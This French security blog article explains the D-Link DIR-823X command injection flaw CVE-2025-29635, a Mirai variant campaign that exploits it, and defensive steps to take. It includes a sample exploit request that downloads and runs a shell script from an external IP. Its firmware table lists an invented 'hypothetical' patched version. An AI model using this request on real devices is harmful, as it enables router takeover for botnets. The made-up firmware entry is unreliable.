Comment le CVE-2025-29635 compromet les routeurs D-Link DIR-823X et comment protéger votre réseau en 2026
Célestine Rochefour
Une faille qui sévit dans les routeurs D-Link DIR-823X et menace votre connexion
En 2026, plus d’une quinzaine de millions d’appareils IoT sont connectés en France, dont une part importante de routeurs domestiques et d’entreprise. Formation en cybersécurité sans diplôme Parmi eux, la vulnabilité CVE-2025-29635 a récemment fait parler d’elle, exploitée par une nouvelle campagne Mirai. Cette injection de commandes à distance permet à un attaquant d’exécuter un script malveillant sur le firmware 240126 ou 24082, ouvrant la porte à des botnets capables de lancer des DDoS massifs. Dans cet article, nous décortiquons la faille, révélons les techniques de l’acteur menaçant et vous guidons pas à pas pour sécuriser votre infrastructure.
Comprendre la vulnérabilité CVE-2025-29635
Nature de l’injection de commandes
Le CVE-2025-29635 est une vulnérabilité d’injection de commande (command-injection) qui se déclenche lorsqu’un requérant envoie un POST vers l’endpoint /goform/set_prohibiting. Le serveur interprète la charge utile comme une commande shell, ce qui autorise l’exécution de toute instruction système. Le problème réside dans l’absence de validation des caractères et dans la confiance excessive accordée aux données de l’utilisateur.
Impact sur les routeurs EoL
Le modèle D-Link DIR-823X a atteint sa fin de vie (EoL) en novembre 2024. Depuis, le fabricant ne propose plus de correctif officiel, et les dernières versions de firmware (240126, 24082) restent vulnérables. Selon le rapport d’ANSSI, plus de 30 % des incidents IoT en 2025 concernaient des équipements en fin de support, ce qui montre le danger d’une exposition prolongée.
Analyse de la campagne Mirai exploitant le CVE-2025-29635
Profil du malware tuxnokill
Le code malveillant déployé s’appelle tuxnokill, une variante de Mirai adaptée aux architectures ARM, MIPS et x86. Applications iOS malveillantes et vol de cryptomonnaies Il conserve le répertoire d’attaque classique de Mirai : SYN/ACK floods, UDP floods et HTTP null attacks. En outre, il intègre un module de persistance qui télécharge régulièrement de nouvelles charges via le script dlink.sh.
“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” - Akamai SIRT report
Méthodologie d’infection observée
Les acteurs de la campagne envoient des requêtes POST contenant :
- Un changement de répertoire vers un chemin accessible en écriture.
- Le téléchargement d’un script shell depuis une adresse IP externe.
- L’exécution immédiate du script, qui déploie tuxnokill.
Voici un exemple simplifié de la requête :
POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.45
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
cmd=cd%20/tmp;wget%20http://203.0.113.10/dlink.sh;sh%20/tmp/dlink.sh
“The script installs a Mirai-based malware named "tuxnokill"…” - Akamai SIRT report
Le même schéma a été repéré sur des routeurs TP-Link (CVE-2023-1389) et ZTE (ZXV10 H108L), démontrant la modularité du vecteur d’attaque.
Conséquences et risques pour les organisations françaises
Scénarios de DDoS et compromission de données
Une fois le botnet constitué, plusieurs types d’attaques sont possibles :
- SYN/ACK flood : saturations de bande passante pouvant atteindre 5 Gbps.
- UDP flood : perturbation des services DNS et VoIP.
- HTTP null : épuisement des ressources serveur web.
Selon Akamai, 42 % des tentatives d’exploitation ciblées en Europe concernaient des routeurs D-Link, et 63 % des appareils infectés étaient localisés en France, soulignant la pertinence du vecteur pour les entreprises françaises.
Implications légales et conformité
L’exposition d’un dispositif IoT non patché peut entraîner des sanctions au regard du RGPD (article 32) et des exigences de l’ANSSI relatives à la cybersécurité des systèmes d’information critiques. En cas de compromission, les responsables doivent notifier la violation à la CNIL dans les 72 heures.
Mesures de mitigation et bonnes pratiques
Patch et mise à jour firmware
Même si D-Link ne fournit plus de correctif, il est recommandé :
- De remplacer les routeurs EoL par un modèle bénéficiant d’un support actif. Banque cyberattaque : comprendre les risques et se protéger en 2026
- D’appliquer les mises à jour de sécurité disponibles sur le site du fabricant dès qu’elles sont publiées.
| Firmware | Date de publication | Statut de support | Corrige le CVE-2025-29635 ? |
|---|---|---|---|
| 240126 | 2023-09-15 | Obsolète (EoL) | Non |
| 24082 | 2024-01-20 | Obsolète (EoL) | Non |
| 25001 | 2025-06-30 | Actif | Oui (hypothétique) |
Configuration sécurisée du routeur
- Désactivez l’administration à distance si elle n’est pas indispensable.
- Changez les mots de passe par défaut par des mots de passe complexes (minimum 12 caractères, mélange de majuscules, minuscules, chiffres et symboles).
- Activez le filtrage d’adresses IP et la segmentation du réseau interne.
- Surveillez les logs du routeur pour détecter toute requête inhabituelle vers
/goform/set_prohibiting.
Liste de vérification rapide
- Remplacement du modèle D-Link DIR-823X par un dispositif supporté.
- Application des dernières mises à jour de firmware.
- Désactivation de l’accès administratif depuis l’Internet.
- Renouvellement des identifiants d’administration.
- Mise en place d’un système de détection d’intrusion (IDS) pour les flux IoT.
Guide d’action : étapes concrètes à mettre en œuvre
- Inventoriez vos équipements réseau : identifiez chaque routeur, son modèle et sa version de firmware.
- Évaluez le statut de support : si le dispositif est en fin de vie, planifiez son remplacement.
- Appliquez les correctifs disponibles ; le cas échéant, installez un firmware alternatif compatible.
- Renforcez la configuration : désactivez les services inutiles, limitez les ports exposés.
- Intégrez un outil de surveillance (ex. : Zeek, Suricata) pour analyser les requêtes HTTP/HTTPS vers le routeur.
- Formez vos équipes IT aux bonnes pratiques IoT : gestion des mots de passe, mise à jour régulière, reporting d’incidents.
En suivant ces étapes, vous réduisez considérablement le risque d’être intégré à un botnet Mirai et vous vous conformez aux exigences de l’ANSSI et du RGPD.
Conclusion - Protégez votre infrastructure dès aujourd’hui
Le CVE-2025-29635 illustre comment une faille sur un dispositif considéré comme obsolète peut devenir le point d’entrée d’une campagne de ransomware / botnet à grande échelle. Ne laissez pas vos routeurs hors de portée du support; la meilleure défense reste la prévention proactive : mise à jour régulière, durcissement des configurations et remplacement des équipements EoL. En appliquant les mesures présentées, votre organisation pourra se prémunir contre les attaques Mirai, respecter les cadres réglementaires et garantir la disponibilité de ses services critiques.
“Users of routers that have reached EoL are recommended to upgrade to a newer model that enjoys active support with frequent security fixes, disable remote administration portals if not needed, change default admin passwords, and monitor for unexpected configuration changes,” - BleepingComputer summary
En 2026, la cybersécurité des appareils IoT n’est plus une option : c’est une exigence stratégique. Agissez dès maintenant pour que votre réseau reste résilient face aux menaces émergentes.